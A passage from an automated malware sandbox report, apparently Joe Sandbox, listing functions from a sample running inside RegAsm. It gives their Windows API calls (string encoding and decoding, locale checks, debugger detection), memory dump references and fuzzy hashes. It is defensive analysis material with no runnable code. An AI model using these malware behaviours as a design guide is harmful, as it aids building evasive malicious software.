                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                                                                • Opcode ID: dfa3e6b1570eacda34443177cbf96086393f97298584face2c088795e5b34245
                                                                                                                                                                                                • Instruction ID: 02b60dad9058998549bb9f9427ebed67f2773473b30bd0c64c07e2ca17a5da6a
                                                                                                                                                                                                • Opcode Fuzzy Hash: dfa3e6b1570eacda34443177cbf96086393f97298584face2c088795e5b34245
                                                                                                                                                                                                • Instruction Fuzzy Hash: EA21A7B2B04385EBD7258F54C985ACB73AAFF74E50B468464F949DB224EF32D940C390
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040628E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48encryptionmemoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,EY@,00000000,00000000), ref: 004062AE
                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,EY@,?,?,00405945,00000000,?,?), ref: 004062BC
                                                                                                                                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,EY@,00000000,00000000), ref: 004062D2
                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,00405945,00000000,?,?), ref: 004062E1
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                • String ID: EY@
                                                                                                                                                                                                • API String ID: 4291131564-2494902708
                                                                                                                                                                                                • Opcode ID: 5e238f24b81681bd1e218dc304b4b0d5aee478eb474be9148ccb694fddff89b6
                                                                                                                                                                                                • Instruction ID: 43e50b12db5afe856a27d0bb544b4c294b41ea24d0f69f4703884080ee459dc8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e238f24b81681bd1e218dc304b4b0d5aee478eb474be9148ccb694fddff89b6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4901E878501234BFDB215F56DC88E8B7FB9EF4ABA0B104066FA09A6250D3718950CBF4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B493AA3 Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetUserDefaultLCID.KERNEL32 ref: 1B68365A
                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 1B683698
                                                                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 1B6836AB
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 1B6836F3
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 1B68370E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3475089800-0
                                                                                                                                                                                                • Opcode ID: 5ace09f0643fd6edf023da7740a28bae7d4c227f0b5763484de4fda40f171a1f
                                                                                                                                                                                                • Instruction ID: a7b609a71a6b5ad30093bdfde44b0c336557b90e45ec40f318e2c516c26a7d89
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ace09f0643fd6edf023da7740a28bae7d4c227f0b5763484de4fda40f171a1f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 50517FB1A003199BDF00DFA8CCC5AEE77B8AF68700F514469F945EB290E770E544CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040247E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52encryptionCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004024A3
                                                                                                                                                                                                • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024C9
                                                                                                                                                                                                • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024E3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: BinaryCryptString$memset
                                                                                                                                                                                                • String ID: UNK
                                                                                                                                                                                                • API String ID: 1505698593-448974810
                                                                                                                                                                                                • Opcode ID: 24710f217eb89de3a911c962e59937511e8ad6c45f6b7a2033ea0e584d2049c4
                                                                                                                                                                                                • Instruction ID: 1db11c524df1ba3f2b3cdc5e317fdc1745e161463e274adae209a2badf0b8562
                                                                                                                                                                                                • Opcode Fuzzy Hash: 24710f217eb89de3a911c962e59937511e8ad6c45f6b7a2033ea0e584d2049c4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 48014FB260015C7EE711EA99DD81DFB77BCEB44658F1000BBB604A6181D6F8AE485A78
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B492C8E Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 1B6348A7
                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 1B634973
                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1B634993
                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 1B63499D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                                • Opcode ID: 9a88d4c4e8e8cea26282c3feb9687bc2c79333e8c21b5a135b102b42a6ef9fd0
                                                                                                                                                                                                • Instruction ID: 31bc81b5b5b91e9dd87300919530258f0d202e6ea6a0361f4042dc1ef30befe3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a88d4c4e8e8cea26282c3feb9687bc2c79333e8c21b5a135b102b42a6ef9fd0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 673118B9D0521D9BDF10DFA4D9897CDBBF8EF18300F1041AAE54CAB250EB719A858F05
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4EEF30 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
                                                                                                                                                                                                • Instruction ID: 482d3208f290f87b38d2af5aa68c266bc60a94a5c58e0d721e00763f56b9e8f9
                                                                                                                                                                                                • Opcode Fuzzy Hash: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D11E531D449527BDB628B25E840BC6FB90BF48321F058668E8999BB60D325F860C7E1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040FD97 Relevance: 6.1, APIs: 4, Instructions: 53memoryencryptionCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040FDBB
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00404437,?,?,?,?,?,?), ref: 0040FDC8
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00404437,?,?,?,?,?,?), ref: 0040FDCF
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocBinaryCryptProcessString
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1871034439-0
                                                                                                                                                                                                • Opcode ID: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
                                                                                                                                                                                                • Instruction ID: b0baf21781654d778722d2fe58ae3f68db65f40c6e5e83cc14e0cbddb1f71206
                                                                                                                                                                                                • Opcode Fuzzy Hash: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
                                                                                                                                                                                                • Instruction Fuzzy Hash: CE012971500219FFDF218FA5DC449ABBBAEFF8A350B20047AF941A3260D6359D51EBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B553770 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
                                                                                                                                                                                                • Instruction ID: d2a98928f23e8ac572a924b0bdb8aa491cfea796be63eb507e3d4ff8b14d4084
                                                                                                                                                                                                • Opcode Fuzzy Hash: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DE09A35004700BBCE125B51ED46E8ABFA6BF88710F044C1CF5D521570C672A860AB41
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5737E0 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
                                                                                                                                                                                                • Instruction ID: bc59f380206d52fb765ea42e83cc6f9ee6fb8d0cebe5d5099ac976546dd5ca40
                                                                                                                                                                                                • Opcode Fuzzy Hash: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
                                                                                                                                                                                                • Instruction Fuzzy Hash: A5E0BF35004740BBCF125F52EC46F8BBFA6AF8C314F044C1CF59561470C7B2A8A1AB41
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B535910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 1B53597E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
                                                                                                                                                                                                • API String ID: 0-143322027
                                                                                                                                                                                                • Opcode ID: b00e2298a964fa2ee39e910ebb98ed6e8b295c62d6d7dc2bfbaa53eff1003cf9
                                                                                                                                                                                                • Instruction ID: ab5d777cfec054a9076f972cf23903808beb3879676356048eaad9d88ebe80e3
                                                                                                                                                                                                • Opcode Fuzzy Hash: b00e2298a964fa2ee39e910ebb98ed6e8b295c62d6d7dc2bfbaa53eff1003cf9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A113AB6500606BFEB109F55DC85FC6BBADFF89318F008555F9089B251C3B2B5A4CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B54D3B0 Relevance: 4.6, APIs: 3, Instructions: 119COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 98ce99723b6345aad24377ea125308a6216303bfe646e2d251e407c47f6146cf
                                                                                                                                                                                                • Instruction ID: 31b300ac99d0818408f83239e3456e622df7c17267ed91a90e9c3dc200a7fca2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 98ce99723b6345aad24377ea125308a6216303bfe646e2d251e407c47f6146cf
